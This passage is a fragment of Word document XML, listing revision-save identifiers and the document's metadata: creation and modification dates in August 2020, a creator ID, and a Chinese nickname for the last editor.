    <w:rsid w:val="094A6A19"/>
    <w:rsid w:val="09A05C46"/>
    <w:rsid w:val="09F950ED"/>
    <w:rsid w:val="0B3B6C27"/>
    <w:rsid w:val="0D5A281B"/>
    <w:rsid w:val="0FBD0B2F"/>
    <w:rsid w:val="122A2C50"/>
    <w:rsid w:val="189D64A6"/>
    <w:rsid w:val="194473F2"/>
    <w:rsid w:val="1FC047DB"/>
    <w:rsid w:val="22E50F00"/>
    <w:rsid w:val="232B61B3"/>
    <w:rsid w:val="238F6F8C"/>
    <w:rsid w:val="2CAC4A17"/>
    <w:rsid w:val="2DFD67DE"/>
    <w:rsid w:val="2FA82F60"/>
    <w:rsid w:val="30731878"/>
    <w:rsid w:val="307D34E8"/>
    <w:rsid w:val="33096711"/>
    <w:rsid w:val="369448B6"/>
    <w:rsid w:val="37E76FA5"/>
    <w:rsid w:val="3AD5209B"/>
    <w:rsid w:val="465D3BD5"/>
    <w:rsid w:val="48E767E8"/>
    <w:rsid w:val="4D760C2F"/>
    <w:rsid w:val="4DB700F4"/>
    <w:rsid w:val="522D54E4"/>
    <w:rsid w:val="554B00E7"/>
    <w:rsid w:val="558501AC"/>
    <w:rsid w:val="578B33EA"/>
    <w:rsid w:val="57CB27A7"/>
    <w:rsid w:val="5F2F055B"/>
    <w:rsid w:val="6378614C"/>
    <w:rsid w:val="64517F4E"/>
    <w:rsid w:val="645A593F"/>
    <w:rsid w:val="67536C25"/>
    <w:rsid w:val="6A3A169E"/>
    <w:rsid w:val="6B766EAB"/>
    <w:rsid w:val="6C6A7ED8"/>
    <w:rsid w:val="70943328"/>
    <w:rsid w:val="71172767"/>
    <w:rsid w:val="71382258"/>
    <w:rsid w:val="73115FA2"/>
    <w:rsid w:val="747B7712"/>
    <w:rsid w:val="75F42807"/>
    <w:rsid w:val="76F1017C"/>
    <w:rsid w:val="795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2020-08-20T06:01:00Z</dcterms:created>
  <dc:creator>20247</dc:creator>
  <cp:lastModifiedBy>没有昵称就是最好的昵称</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-21T12:59:02Z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